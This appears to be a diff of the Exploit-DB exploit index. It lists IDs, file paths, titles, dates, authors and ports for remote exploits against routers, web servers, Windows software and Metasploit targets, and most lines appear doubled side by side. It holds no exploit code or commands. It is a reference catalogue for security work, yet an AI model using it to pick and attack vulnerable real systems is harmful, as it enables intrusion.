18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk - ActiveX BackImage (Metasploit)",2012-03-21,Metasploit,windows,remote,0 18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk - ActiveX BackImage (Metasploit)",2012-03-21,Metasploit,windows,remote,0
18640,platforms/windows/remote/18640.txt,"Google Talk - 'gtalk://' Deprecated URI Handler Parameter Injection",2012-03-22,rgod,windows,remote,0 18640,platforms/windows/remote/18640.txt,"Google Talk - 'gtalk://' Deprecated URI Handler Parameter Injection",2012-03-22,rgod,windows,remote,0
18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)",2012-03-22,Metasploit,windows,remote,0 18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)",2012-03-22,Metasploit,windows,remote,0
@ -12000,7 +11997,6 @@ id,file,description,date,author,platform,type,port
20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 - Internal Variable Override",2000-07-04,"Adrian Daminato",cgi,remote,0 20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 - Internal Variable Override",2000-07-04,"Adrian Daminato",cgi,remote,0
20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote,0 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote,0
20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,linux,remote,0 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,linux,remote,0
20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution",2012-07-24,muts,linux,remote,0
20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote,0 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote,0
20066,platforms/windows/remote/20066.java,"Michael Lamont Savant Web Server 2.1/3.0 - Buffer Overflow",2000-07-03,Wizdumb,windows,remote,0 20066,platforms/windows/remote/20066.java,"Michael Lamont Savant Web Server 2.1/3.0 - Buffer Overflow",2000-07-03,Wizdumb,windows,remote,0
20067,platforms/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 - Forged TCP RST",2000-07-10,"Citec Network Securities",hardware,remote,0 20067,platforms/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 - Forged TCP RST",2000-07-10,"Citec Network Securities",hardware,remote,0
@ -13304,7 +13300,6 @@ id,file,description,date,author,platform,type,port
23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal",2004-03-22,"Donato Ferrante",linux,remote,0 23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal",2004-03-22,"Donato Ferrante",linux,remote,0
23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 - TargetName Parameter Cross-Site Scripting",2004-03-22,"Richard Maudsley",windows,remote,0 23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 - TargetName Parameter Cross-Site Scripting",2004-03-22,"Richard Maudsley",windows,remote,0
23873,platforms/multiple/remote/23873.c,"Mythic Entertainment Dark Age of Camelot 1.6x - Encryption Key Signing",2004-03-23,"Todd Chapman",multiple,remote,0 23873,platforms/multiple/remote/23873.c,"Mythic Entertainment Dark Age of Camelot 1.6x - Encryption Key Signing",2004-03-23,"Todd Chapman",multiple,remote,0
23875,platforms/windows/remote/23875.txt,"Trend Micro Interscan VirusWall localweb - Directory Traversal",2004-03-24,"Tri Huynh",windows,remote,0
23879,platforms/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal",2004-03-24,wirepair,windows,remote,0 23879,platforms/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal",2004-03-24,wirepair,windows,remote,0
23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution",2004-03-24,wirepair,windows,remote,0 23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution",2004-03-24,wirepair,windows,remote,0
23881,platforms/linux/remote/23881.txt,"Emil 2.x - Multiple Buffer Overrun / Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",linux,remote,0 23881,platforms/linux/remote/23881.txt,"Emil 2.x - Multiple Buffer Overrun / Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",linux,remote,0
@ -13731,7 +13726,6 @@ id,file,description,date,author,platform,type,port
26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0
26004,platforms/multiple/remote/26004.txt,"Oracle Reports Server 10g 9.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26004,platforms/multiple/remote/26004.txt,"Oracle Reports Server 10g 9.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-19,"Alexander Kornbrust",multiple,remote,0
26006,platforms/multiple/remote/26006.txt,"Oracle Reports Server 6.0.8/9.0.x - Unauthorized Report Execution",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26006,platforms/multiple/remote/26006.txt,"Oracle Reports Server 6.0.8/9.0.x - Unauthorized Report Execution",2005-07-19,"Alexander Kornbrust",multiple,remote,0
26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,remote,80
26013,platforms/multiple/remote/26013.txt,"Oracle Forms 6i/9i/4.5.10/5.0/6.0.8/10g Services - Unauthorized Form Execution",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26013,platforms/multiple/remote/26013.txt,"Oracle Forms 6i/9i/4.5.10/5.0/6.0.8/10g Services - Unauthorized Form Execution",2005-07-19,"Alexander Kornbrust",multiple,remote,0
26022,platforms/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ - Unauthorized Access",2005-07-25,d.is.evil,hardware,remote,0 26022,platforms/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ - Unauthorized Access",2005-07-25,d.is.evil,hardware,remote,0
26024,platforms/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal",2005-07-25,"Martin O'Neal",linux,remote,0 26024,platforms/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal",2005-07-25,"Martin O'Neal",linux,remote,0
@ -13824,7 +13818,6 @@ id,file,description,date,author,platform,type,port
27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure - ldapsyncnow.php Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443 27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure - ldapsyncnow.php Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443
27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,unix,remote,7443 27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,unix,remote,7443
27319,platforms/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series - NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",hardware,remote,0 27319,platforms/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series - NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",hardware,remote,0
27320,platforms/hardware/remote/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting",2006-02-25,"Preben Nylokken",hardware,remote,0
27325,platforms/windows/remote/27325.txt,"DirectContact 0.3.b - Directory Traversal",2006-02-27,"Donato Ferrante",windows,remote,0 27325,platforms/windows/remote/27325.txt,"DirectContact 0.3.b - Directory Traversal",2006-02-27,"Donato Ferrante",windows,remote,0
27326,platforms/linux/remote/27326.txt,"MySQL 5.0.18 - Query Logging Bypass",2006-02-27,1dt.w0lf,linux,remote,0 27326,platforms/linux/remote/27326.txt,"MySQL 5.0.18 - Query Logging Bypass",2006-02-27,1dt.w0lf,linux,remote,0
27378,platforms/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 - Full Path Request Arbitrary File Upload",2006-03-09,"Revnic Vasile",windows,remote,0 27378,platforms/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 - Full Path Request Arbitrary File Upload",2006-03-09,"Revnic Vasile",windows,remote,0
@ -14164,7 +14157,6 @@ id,file,description,date,author,platform,type,port
30809,platforms/windows/remote/30809.txt,"SafeNet Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal",2007-11-26,"Corey Lebleu",windows,remote,0 30809,platforms/windows/remote/30809.txt,"SafeNet Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal",2007-11-26,"Corey Lebleu",windows,remote,0
30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,5000 30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,5000
30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,linux,remote,80 30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,linux,remote,80
30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,remote,7071
30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,8080 30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,8080
30485,platforms/hardware/remote/30485.html,"ZYXEL ZyWALL 2 3.62 - Forms/General_1 sysSystemName Parameter Cross-Site Scripting",2007-08-10,"Henri Lindberg",hardware,remote,0 30485,platforms/hardware/remote/30485.html,"ZYXEL ZyWALL 2 3.62 - Forms/General_1 sysSystemName Parameter Cross-Site Scripting",2007-08-10,"Henri Lindberg",hardware,remote,0
30490,platforms/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 - 'TBLinf32.dll' ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",windows,remote,0 30490,platforms/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 - 'TBLinf32.dll' ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",windows,remote,0
@ -14578,7 +14570,6 @@ id,file,description,date,author,platform,type,port
33084,platforms/multiple/remote/33084.txt,"Oracle 9i/10g Database - Network Foundation Remote",2009-06-14,"Dennis Yurichev",multiple,remote,0 33084,platforms/multiple/remote/33084.txt,"Oracle 9i/10g Database - Network Foundation Remote",2009-06-14,"Dennis Yurichev",multiple,remote,0
33089,platforms/windows/remote/33089.pl,"iDefense COMRaider - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0 33089,platforms/windows/remote/33089.pl,"iDefense COMRaider - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0
33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Buffer Overflow",2009-11-12,HACKATTACK,novell,remote,0 33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Buffer Overflow",2009-11-12,HACKATTACK,novell,remote,0
33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,multiple,remote,0
33580,platforms/hardware/remote/33580.txt,"COMTREND CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,hardware,remote,0 33580,platforms/hardware/remote/33580.txt,"COMTREND CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,hardware,remote,0
33095,platforms/windows/remote/33095.rb,"Adobe Flash Player - Type Confusion Remote Code Execution (Metasploit)",2014-04-29,Metasploit,windows,remote,0 33095,platforms/windows/remote/33095.rb,"Adobe Flash Player - Type Confusion Remote Code Execution (Metasploit)",2014-04-29,Metasploit,windows,remote,0
33103,platforms/linux/remote/33103.html,"Mozilla Firefox 3.5.1 - Error Page Address Bar URI Spoofing",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0 33103,platforms/linux/remote/33103.html,"Mozilla Firefox 3.5.1 - Error Page Address Bar URI Spoofing",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0
@ -14680,7 +14671,6 @@ id,file,description,date,author,platform,type,port
33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0
33712,platforms/windows/remote/33712.txt,"VideoLAN VLC Media Player 1.0.x - Bookmark Creation Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,remote,0 33712,platforms/windows/remote/33712.txt,"VideoLAN VLC Media Player 1.0.x - Bookmark Creation Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,remote,0
33739,platforms/hardware/remote/33739.txt,"Yealink VoIP Phone SIP-T38G - Default Credentials",2014-06-13,Mr.Un1k0d3r,hardware,remote,0 33739,platforms/hardware/remote/33739.txt,"Yealink VoIP Phone SIP-T38G - Default Credentials",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33740,platforms/hardware/remote/33740.txt,"Yealink VoIP Phone SIP-T38G - Local File Inclusion",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33741,platforms/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,hardware,remote,0 33741,platforms/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33742,platforms/hardware/remote/33742.txt,"Yealink VoIP Phone SIP-T38G - Privilege Escalation",2014-06-13,Mr.Un1k0d3r,hardware,remote,0 33742,platforms/hardware/remote/33742.txt,"Yealink VoIP Phone SIP-T38G - Privilege Escalation",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33750,platforms/windows/remote/33750.txt,"Microsoft Windows XP/2000 - Help File Relative Path Remote Command Execution",2010-03-06,Secumania,windows,remote,0 33750,platforms/windows/remote/33750.txt,"Microsoft Windows XP/2000 - Help File Relative Path Remote Command Execution",2010-03-06,Secumania,windows,remote,0
@ -14942,7 +14932,6 @@ id,file,description,date,author,platform,type,port
35386,platforms/linux/remote/35386.txt,"Logwatch Log File - Special Characters Privilege Escalation",2011-02-24,"Dominik George",linux,remote,0 35386,platforms/linux/remote/35386.txt,"Logwatch Log File - Special Characters Privilege Escalation",2011-02-24,"Dominik George",linux,remote,0
35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote,0 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote,0
35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - '.dps' Remote Buffer Overflow",2011-02-28,KedAns-Dz,windows,remote,0 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - '.dps' Remote Buffer Overflow",2011-02-28,KedAns-Dz,windows,remote,0
35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion",2011-03-04,"AutoSec Tools",windows,remote,0
35420,platforms/hardware/remote/35420.txt,"IPUX Cube Type CS303C IP Camera - 'UltraMJCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0 35420,platforms/hardware/remote/35420.txt,"IPUX Cube Type CS303C IP Camera - 'UltraMJCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
35421,platforms/hardware/remote/35421.txt,"IPUX CL5452/CL5132 IP Camera - 'UltraSVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0 35421,platforms/hardware/remote/35421.txt,"IPUX CL5452/CL5132 IP Camera - 'UltraSVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
35422,platforms/hardware/remote/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - 'UltraHVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0 35422,platforms/hardware/remote/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - 'UltraHVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
@ -14967,7 +14956,6 @@ id,file,description,date,author,platform,type,port
35570,platforms/multiple/remote/35570.txt,"python-feedparser 5.0 - 'feedparser/feedparser.py' Cross-Site Scripting",2011-04-05,fazalmajid,multiple,remote,0 35570,platforms/multiple/remote/35570.txt,"python-feedparser 5.0 - 'feedparser/feedparser.py' Cross-Site Scripting",2011-04-05,fazalmajid,multiple,remote,0
35573,platforms/windows/remote/35573.txt,"Microsoft Excel - Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",windows,remote,0 35573,platforms/windows/remote/35573.txt,"Microsoft Excel - Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",windows,remote,0
35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution (Metasploit)",2014-12-19,"Patrick Webster",linux,remote,6082 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution (Metasploit)",2014-12-19,"Patrick Webster",linux,remote,6082
35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,remote,9000
35597,platforms/hardware/remote/35597.txt,"FiberHome HG-110 - Cross-Site Scripting / Directory Traversal",2011-04-08,Zerial,hardware,remote,0 35597,platforms/hardware/remote/35597.txt,"FiberHome HG-110 - Cross-Site Scripting / Directory Traversal",2011-04-08,Zerial,hardware,remote,0
35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 - kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",linux,remote,0 35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 - kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",linux,remote,0
35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 - '.m3u8' Remote Buffer Overflow",2011-04-12,KedAns-Dz,windows,remote,0 35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 - '.m3u8' Remote Buffer Overflow",2011-04-12,KedAns-Dz,windows,remote,0
@ -15079,7 +15067,6 @@ id,file,description,date,author,platform,type,port
36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products - 'file' Parameter Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0 36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products - 'file' Parameter Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0
36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Cross-Site Scripting",2011-10-26,Sangteamtham,windows,remote,0 36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Cross-Site Scripting",2011-10-26,Sangteamtham,windows,remote,0
36264,platforms/php/remote/36264.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)",2015-03-04,Metasploit,php,remote,80 36264,platforms/php/remote/36264.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)",2015-03-04,Metasploit,php,remote,80
36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0
36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross-Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0 36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross-Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0
36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 - Remote Command Execution (Metasploit)",2015-03-06,Metasploit,windows,remote,5555 36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 - Remote Command Execution (Metasploit)",2015-03-06,Metasploit,windows,remote,5555
36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0 36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0
@ -15153,7 +15140,6 @@ id,file,description,date,author,platform,type,port
36995,platforms/hardware/remote/36995.txt,"F5 FirePass 7.0 - SQL Injection",2012-03-14,anonymous,hardware,remote,0 36995,platforms/hardware/remote/36995.txt,"F5 FirePass 7.0 - SQL Injection",2012-03-14,anonymous,hardware,remote,0
37169,platforms/linux/remote/37169.rb,"Realtek SDK - Miniigd UPnP SOAP Command Execution (Metasploit)",2015-06-01,Metasploit,linux,remote,52869 37169,platforms/linux/remote/37169.rb,"Realtek SDK - Miniigd UPnP SOAP Command Execution (Metasploit)",2015-06-01,Metasploit,linux,remote,52869
36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router - Cross-Site Request Forgery (Multiple Function)",2012-02-21,Busindre,hardware,remote,0 36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router - Cross-Site Request Forgery (Multiple Function)",2012-02-21,Busindre,hardware,remote,0
36865,platforms/hardware/remote/36865.txt,"Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0
36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router - webconfig/wan/confirm.html/confirm pvcName Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0 36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router - webconfig/wan/confirm.html/confirm pvcName Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0
36877,platforms/hardware/remote/36877.html,"Multiple D-Link DCS Products - 'security.cgi' Cross-Site Request Forgery",2012-02-23,"Rigan Iimrigan",hardware,remote,0 36877,platforms/hardware/remote/36877.html,"Multiple D-Link DCS Products - 'security.cgi' Cross-Site Request Forgery",2012-02-23,"Rigan Iimrigan",hardware,remote,0
36880,platforms/windows/remote/36880.rb,"Adobe Flash Player - UncompressViaZlibVariant Uninitialized Memory (Metasploit)",2015-05-01,Metasploit,windows,remote,0 36880,platforms/windows/remote/36880.rb,"Adobe Flash Player - UncompressViaZlibVariant Uninitialized Memory (Metasploit)",2015-05-01,Metasploit,windows,remote,0
@ -15239,7 +15225,6 @@ id,file,description,date,author,platform,type,port
37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0
37958,platforms/multiple/remote/37958.rb,"Mozilla Firefox - 'pdf.js' Privileged JavaScript Injection (Metasploit)",2015-08-24,Metasploit,multiple,remote,0 37958,platforms/multiple/remote/37958.rb,"Mozilla Firefox - 'pdf.js' Privileged JavaScript Injection (Metasploit)",2015-08-24,Metasploit,multiple,remote,0
37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI redirection",2012-10-21,"Aung Khant",hardware,remote,0 37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI redirection",2012-10-21,"Aung Khant",hardware,remote,0
37982,platforms/hardware/remote/37982.pl,"TP-Link TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",hardware,remote,0
37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80
37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'Filename' Parameter Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0 37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'Filename' Parameter Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0
38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - 'GET' Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - 'GET' Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
@ -15323,7 +15308,6 @@ id,file,description,date,author,platform,type,port
38591,platforms/hardware/remote/38591.py,"TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass",2013-06-19,SANTHO,hardware,remote,0 38591,platforms/hardware/remote/38591.py,"TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass",2013-06-19,SANTHO,hardware,remote,0
38597,platforms/multiple/remote/38597.txt,"Motion - Multiple Vulnerabilities",2013-06-26,xistence,multiple,remote,0 38597,platforms/multiple/remote/38597.txt,"Motion - Multiple Vulnerabilities",2013-06-26,xistence,multiple,remote,0
38599,platforms/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win_x86,remote,0 38599,platforms/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win_x86,remote,0
38604,platforms/hardware/remote/38604.txt,"Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,remote,0
38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices - Multiple Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0 38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices - Multiple Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0
38627,platforms/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0 38627,platforms/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0
38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0
@ -15380,7 +15364,6 @@ id,file,description,date,author,platform,type,port
38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock) (Metasploit)",2015-12-02,Metasploit,cgi,remote,0 38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock) (Metasploit)",2015-12-02,Metasploit,cgi,remote,0
38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote,0 38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote,0
38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router - Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0 38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router - Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0
38853,platforms/hardware/remote/38853.sh,"Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,remote,0
38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation() (Metasploit)",2015-12-03,Metasploit,windows,remote,7777 38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation() (Metasploit)",2015-12-03,Metasploit,windows,remote,7777
